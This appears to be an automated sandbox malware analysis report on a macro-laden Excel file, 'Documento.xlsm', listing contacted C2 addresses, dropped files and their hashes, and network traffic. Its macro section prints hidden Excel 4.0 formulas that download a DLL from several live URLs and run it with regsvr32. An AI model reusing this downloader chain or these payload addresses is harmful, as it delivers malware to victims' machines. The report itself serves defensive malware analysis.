http://www.diginotar.nl/cps/pkioverheid0	regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://135.148.121.246/j	regsvr32.exe, 0000000B.00000002.711970606.00000000004BE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwiccH~A	regsvr32.exe, 0000000B.00000002.711992789.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwot~H	regsvr32.exe, 0000000B.00000002.711992789.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://crl.entrust.net/server1.crl0	regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net0D	regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.entrust.net03	regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	false		high
https://135.148.121.246/b	regsvr32.exe, 0000000B.00000002.711970606.00000000004BE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
195.154.133.20	unknown	France	12876	OnlineSASFR	true
185.157.82.211	unknown	Poland	42927	S-NET-ASPL	true
79.172.212.216	unknown	Hungary	61998	SZERVERPLEXHU	true
212.237.17.99	unknown	Italy	31034	ARUBA-ASNIT	true
110.232.117.186	unknown	Australia	56038	RACKCORP-APRackCorpAU	true
51.254.140.238	unknown	France	16276	OVHFR	true
119.235.255.201	unknown	Indonesia	45146	RAJASA-AS-ID-APPTRajaSepadanAbadiID	true
212.24.98.99	unknown	Lithuania	62282	RACKRAYUABRakrejusLT	true
213.190.4.223	unknown	Germany	47583	AS-HOSTINGERLT	true
138.185.72.26	unknown	Brazil	264343	EmpasoftLtdaMeBR	true
153.126.203.229	unknown	Japan	7684	SAKURA-ASAKURAInternetIncJP	true
81.0.236.90	unknown	Czech Republic	15685	CASABLANCA-ASInternetCollocationProviderCZ	true
216.158.226.206	unknown	United States	19318	IS-AS-1US	true
45.118.115.99	unknown	Indonesia	131717	IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID	true
103.75.201.2	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
103.75.201.4	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
209.126.98.206	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
156.67.219.84	unknown	Cyprus	47583	AS-HOSTINGERLT	true
175.107.196.192	unknown	Pakistan	9541	CYBERNET-APCyberInternetServicesPvtLtdPK	true
217.182.143.207	unknown	France	16276	OVHFR	true
82.165.152.127	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
107.182.225.142	unknown	United States	32780	HOSTINGSERVICES-INCUS	true
45.118.135.203	unknown	Japan	63949	LINODE-APLinodeLLCUS	true
50.116.54.215	unknown	United States	63949	LINODE-APLinodeLLCUS	true
131.100.24.231	unknown	Brazil	61635	GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR	true
135.148.121.246	unknown	United States	18676	AVAYAUS	true
46.55.222.11	unknown	Bulgaria	34841	BALCHIKNETBG	true
173.212.193.249	unknown	Germany	51167	CONTABODE	true
178.79.147.66	unknown	United Kingdom	63949	LINODE-APLinodeLLCUS	true
45.176.232.124	unknown	Colombia	267869	CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC	true
162.243.175.63	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
176.104.106.96	unknown	Serbia	198371	NINETRS	true
31.24.158.56	unknown	Spain	50926	INFORTELECOM-ASES	true
50.30.40.196	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
207.38.84.195	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
164.68.99.3	unknown	Germany	51167	CONTABODE	true
103.134.85.85	unknown	Indonesia	139943	IDNIC-GARUTKAB-AS-IDDinasKomunikasidanInformatikaKabupa	true
212.237.56.116	unknown	Italy	31034	ARUBA-ASNIT	true
45.142.114.231	unknown	Germany	44066	DE-FIRSTCOLOwwwfirst-colonetDE	true
203.114.109.124	unknown	Thailand	131293	TOT-LLI-AS-APTOTPublicCompanyLimitedTH	true
129.232.188.93	unknown	South Africa	37153	xneeloZA	true
159.8.59.82	unknown	United States	36351	SOFTLAYERUS	true
58.227.42.236	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
158.69.222.101	unknown	Canada	16276	OVHFR	true
178.128.83.165	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	578182
Start date:	24.02.2022
Start time:	13:53:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 34s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Documento.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSM@19/11@1/45
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 35.5% (good quality ratio 34%) Quality average: 75.3% Quality standard deviation: 25.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Changed system and user locale, location and keyboard layout to Italian - Italy Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
Excluded IPs from analysis (whitelisted): 40.113.204.88, 173.222.108.210, 173.222.108.226
Excluded domains from analysis (whitelisted): waws-prod-dm1-143.cloudapp.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:53:30	API Interceptor	506x Sleep call for process: regsvr32.exe modified

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 61414 bytes, 1 file
Category:	dropped
Size (bytes):	61414
Entropy (8bit):	7.995245868798237
Encrypted:	true
SSDEEP:	1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5:	ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1:	2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256:	6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512:	FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious:	false
Preview:	MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF....f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.a..x..O..V.t..Y1!.T..`U...-...< _@...\|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.1244568012511515
Encrypted:	false
SSDEEP:	6:kKul7k8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:y79kPlE99SNxAhUeYlUSA/t
MD5:	671B807D13FE23FEE6DF64B38528BB0C
SHA1:	592E27305221E4E6BFBBA9DCE9C83BDC5B368065
SHA-256:	0674E472EFA7A3E2F7B818119807CE4B177B11016E145022D0741005D8814B24
SHA-512:	DEBD23519ED0683349E5D939E62B9913D76F3F68B14BA314D2E350261F07140FDDBD5FA1BF283E40D9C993415EE62609149DEBA0DF4203B98B02A1F654998814
Malicious:	false
Preview:	p...... ..........D..)..(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dll

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	679936
Entropy (8bit):	6.910563837671393
Encrypted:	false
SSDEEP:	12288:Z6ZLutvgrwV8RQc5W1yS0ezL9J6XKTe/vyzfANcN/kJhXx5y:qza8RQc5W1P0Q9sXKTLzflBkn
MD5:	9B303820618ADC4A4828E9E689F73562
SHA1:	64F1453A3E556F6625251D4460EC035257A4E25F
SHA-256:	AB3BC9CFB110ECD8DA508576F02C22947A008FBB28CE1C4C46741044BF359C8B
SHA-512:	35612714A9C29879848E7C6F2D82713EB1F68BE5D7A22449E1560E95A6E002A600873D8C867E6A617F9D40E427273458E2948EAFE8B59C2D1C2E51A572EAE15A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M..ZM..ZM..Z...ZH..Z.%.ZL..Z..ZG..Z..ZT..ZM..Z...Zj'.ZQ..Zj'.Z...Zj'.Z...Zj'.ZL..Zj'.ZL..Zj'.ZL..ZRichM..Z........................PE..L......b...........!.....P...................`......................................e...................................r............0..P.......................pq...................................................`..........@....................text....C.......P.................. ..`.rdata...V...`...`...`..............@..@.data... l.......0..................@....rsrc...P....0......................@..@.reloc.............................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3429A7BE.jpeg

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 2418x1051, frames 3
Category:	dropped
Size (bytes):	197770
Entropy (8bit):	7.489581655824389
Encrypted:	false
SSDEEP:	6144:TysPlevgOrNeduXWNOYYYYYYYYYYYYYYYYYYYYYY+:TrPU4xduGB
MD5:	87E4C080D9EBE408EF871B68B9C9AA61
SHA1:	C2C39756608C8452892C1911C95313B944CE7231
SHA-256:	C8BE21BAC10998180168DEE76FF5095D723E6CC0D09AE69161926E3CBAB36441
SHA-512:	05AA79FC0272B38C977671900031AAB19476EF900209766F0DB2918C391B7607E14A66D677386AC1CC6D13F0FC3852C39C1A7DB3CDD6E10F0CB4C3B364C288D5
Malicious:	false
Preview:	......JFIF.............C....................................................................C.........................................................................r.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....I.>..Q...I..._.cF.ns.?.+...S......._.]d..{C......^S_..7.g9VwW.A.<..S.1o.g.g....o..^.3.Bn.N~kM...U.._3.?.<...@.[..E.......)......../...N.... q.x...(...........1..........N...~".........G..uo......^'E...8........\|=...u?.c..#.?.<...@.[..E.......)......../...N.?. q.x...(?...{..>.....G...Jx#..:..........S......._.]x....@......P......}.......l.....G..uo......G.4..?.

C:\Users\user\AppData\Local\Temp\8833.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Cab38BB.tmp

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 61414 bytes, 1 file
Category:	dropped
Size (bytes):	61414
Entropy (8bit):	7.995245868798237
Encrypted:	true
SSDEEP:	1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5:	ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1:	2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256:	6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512:	FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious:	false
Preview:	MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF....f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.a..x..O..V.t..Y1!.T..`U...-...< _@...\|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

C:\Users\user\AppData\Local\Temp\Tar38BC.tmp

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	161595
Entropy (8bit):	6.302448239972517
Encrypted:	false
SSDEEP:	1536:FlYXleUpAR73k/99oFr+yQNujWNWv+1w/A/rHeGyjYPjCQarsmt6Q/GM:F+X7ARcqhQNujZv+mQjCjrsSP
MD5:	D99661D0893A52A0700B8AE68457351A
SHA1:	01491FD23C4813A602D48988531EA4ABBCDF7ED9
SHA-256:	BDD5111162A6FA25682E18FA74E37E676D49CAFCB5B7207E98E5256D1EF0D003
SHA-512:	6F2291CA958CBF5423CBBE570FD871C4D379A435BE692908CAAACF4C2A68BD81008254802D4F4B212165E93B126ED871A62EAF3067909EB855B29573FC325B8E
Malicious:	false
Preview:	0..w6...H.........w&0..w!...1.0...`.H.e......0..g5..+.....7.....g%0..g 0...+.....7.........\.H....211018201437Z0...+......0..f.0..D.....`...@.,..0..0.r1..0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o

C:\Users\user\AppData\Local\Temp\~DF214DADA29E525B4F.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Documento.xlsm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\xxw1.ocx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	679936
Entropy (8bit):	6.910563837671393
Encrypted:	false
SSDEEP:	12288:Z6ZLutvgrwV8RQc5W1yS0ezL9J6XKTe/vyzfANcN/kJhXx5y:qza8RQc5W1P0Q9sXKTLzflBkn
MD5:	9B303820618ADC4A4828E9E689F73562
SHA1:	64F1453A3E556F6625251D4460EC035257A4E25F
SHA-256:	AB3BC9CFB110ECD8DA508576F02C22947A008FBB28CE1C4C46741044BF359C8B
SHA-512:	35612714A9C29879848E7C6F2D82713EB1F68BE5D7A22449E1560E95A6E002A600873D8C867E6A617F9D40E427273458E2948EAFE8B59C2D1C2E51A572EAE15A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M..ZM..ZM..Z...ZH..Z.%.ZL..Z..ZG..Z..ZT..ZM..Z...Zj'.ZQ..Zj'.Z...Zj'.Z...Zj'.ZL..Zj'.ZL..Zj'.ZL..ZRichM..Z........................PE..L......b...........!.....P...................`......................................e...................................r............0..P.......................pq...................................................`..........@....................text....C.......P.................. ..`.rdata...V...`...`...`..............@..@.data... l.......0..................@....rsrc...P....0......................@..@.reloc.............................@..B................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj (copy)

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	679936
Entropy (8bit):	6.910563837671393
Encrypted:	false
SSDEEP:	12288:Z6ZLutvgrwV8RQc5W1yS0ezL9J6XKTe/vyzfANcN/kJhXx5y:qza8RQc5W1P0Q9sXKTLzflBkn
MD5:	9B303820618ADC4A4828E9E689F73562
SHA1:	64F1453A3E556F6625251D4460EC035257A4E25F
SHA-256:	AB3BC9CFB110ECD8DA508576F02C22947A008FBB28CE1C4C46741044BF359C8B
SHA-512:	35612714A9C29879848E7C6F2D82713EB1F68BE5D7A22449E1560E95A6E002A600873D8C867E6A617F9D40E427273458E2948EAFE8B59C2D1C2E51A572EAE15A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M..ZM..ZM..Z...ZH..Z.%.ZL..Z..ZG..Z..ZT..ZM..Z...Zj'.ZQ..Zj'.Z...Zj'.Z...Zj'.ZL..Zj'.ZL..Zj'.ZL..ZRichM..Z........................PE..L......b...........!.....P...................`......................................e...................................r............0..P.......................pq...................................................`..........@....................text....C.......P.................. ..`.rdata...V...`...`...`..............@..@.data... l.......0..................@....rsrc...P....0......................@..@.reloc.............................@..B................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Microsoft Excel 2007+
Entropy (8bit):	7.50230113901236
TrID:	Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52% Excel Microsoft Office Open XML Format document (40004/1) 40.40% ZIP compressed archive (8000/1) 8.08%
File name:	Documento.xlsm
File size:	214313
MD5:	5acc6f1ff8366ddc895392da4e6a50e3
SHA1:	45b3ef65a4dabdbbefec603fe3dca9bfb1c5c643
SHA256:	0bb184f9c3e9cda4571bd806b90dbda484c331d9dce7af784405fd211f6c71c4
SHA512:	dc1921d8e4c2a2496d1d44f4079e1518015aec4854eed6f7759136bc42b21e39305efc5285a9dd1ab846a73a6dbd04faa60489d0bfc38e00f416fd0ff443dc70
SSDEEP:	6144:CMyysPlevgOrNeduXWNOYYYYYYYYYYYYYYYYYYYYYY1:RyrPU4xduGO
File Content Preview:	PK..........!.G4..............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "Documento.xlsm"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

Name:	Br1
Type:	3
Final:	False
Visible:	False
Protected:	False
Br1 3 False 0 False pre 14,2,=CHAR("101")

Name:	Br2
Type:	3
Final:	False
Visible:	False
Protected:	False
Br2 3 False 0 False pre 2,1,e

Name:	Br2
Type:	3
Final:	False
Visible:	False
Protected:	False
Br2 3 False 0 False post 2,1,e

Name:	EFWFSFG
Type:	4
Final:	False
Visible:	False
Protected:	False
EFWFSFG 4 False 0 False post 10,3,=FORMULA("e";"e")=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.swaong.com/assets/VV4/","..\xxw1.ocx",0,0)";D15)=FORMULA("=IF(DDWD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/7uAnLq8I/","..\xxw1.ocx",0,0))";D17)=FORMULA("=IF(DDWD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://old.liceum9.ru/images/images/NKeRl/","..\xxw1.ocx",0,0))";D19)=FORMULA("=IF(DDWD2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://arttop100.cn/wp-admin/DvyJPADMPW/","..\xxw1.ocx",0,0))";D21)=FORMULA("=IF(DDWD3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,,0,"2&"..\xxw1.ocx",0,0))";D23)=FORMULA("=IF(DDWD4<0, CLOSE(0),)";D25)=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx")";D27)=FORMULA("=RETURN()";D36)14,3,=CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"https://www.swaong.com/assets/VV4/";"..\xxw1.ocx";0;0)16,3,=IF(DDWD<0; CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"http://vulkanvegasbonus.jeunete.com/wp-content/7uAnLq8I/";"..\xxw1.ocx";0;0))18,3,=IF(DDWD1<0; CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"http://old.liceum9.ru/images/images/NKeRl/";"..\xxw1.ocx";0;0))20,3,=IF(DDWD2<0; CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"http://arttop100.cn/wp-admin/DvyJPADMPW/";"..\xxw1.ocx";0;0))22,3,=IF(DDWD3<0; CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"http://peterjacksoncars.com.au/wp-content/sJ/";"..\xxw1.ocx";0;0))24,3,=IF(DDWD4<0; CLOSE(0);)26,3,=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx")35,3,=RETURN()

Name:	EFWFSFG
Type:	4
Final:	False
Visible:	False
Protected:	False
EFWFSFG 4 False 0 False pre 10,3,=FORMULA("e";"e")=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.swaong.com/assets/VV4/","..\xxw1.ocx",0,0)";D15)=FORMULA("=IF(DDWD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/7uAnLq8I/","..\xxw1.ocx",0,0))";D17)=FORMULA("=IF(DDWD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://old.liceum9.ru/images/images/NKeRl/","..\xxw1.ocx",0,0))";D19)=FORMULA("=IF(DDWD2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://arttop100.cn/wp-admin/DvyJPADMPW/","..\xxw1.ocx",0,0))";D21)=FORMULA("=IF(DDWD3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,,0,"2&"..\xxw1.ocx",0,0))";D23)=FORMULA("=IF(DDWD4<0, CLOSE(0),)";D25)=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx")";D27)=FORMULA("=RETURN()";D36)

Name:	Br1
Type:	3
Final:	False
Visible:	False
Protected:	False
Br1 3 False 0 False post 14,2,=CHAR("101")

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2022 13:54:42.410712957 CET	49168	8080	192.168.2.22	135.148.121.246
Feb 24, 2022 13:54:42.513951063 CET	8080	49168	135.148.121.246	192.168.2.22
Feb 24, 2022 13:54:42.514071941 CET	49168	8080	192.168.2.22	135.148.121.246
Feb 24, 2022 13:54:42.617535114 CET	49168	8080	192.168.2.22	135.148.121.246
Feb 24, 2022 13:54:42.722239971 CET	8080	49168	135.148.121.246	192.168.2.22
Feb 24, 2022 13:54:42.754889011 CET	8080	49168	135.148.121.246	192.168.2.22
Feb 24, 2022 13:54:42.754951954 CET	8080	49168	135.148.121.246	192.168.2.22
Feb 24, 2022 13:54:42.755040884 CET	49168	8080	192.168.2.22	135.148.121.246
Feb 24, 2022 13:54:42.758781910 CET	49168	8080	192.168.2.22	135.148.121.246
Feb 24, 2022 13:54:42.775898933 CET	49168	8080	192.168.2.22	135.148.121.246
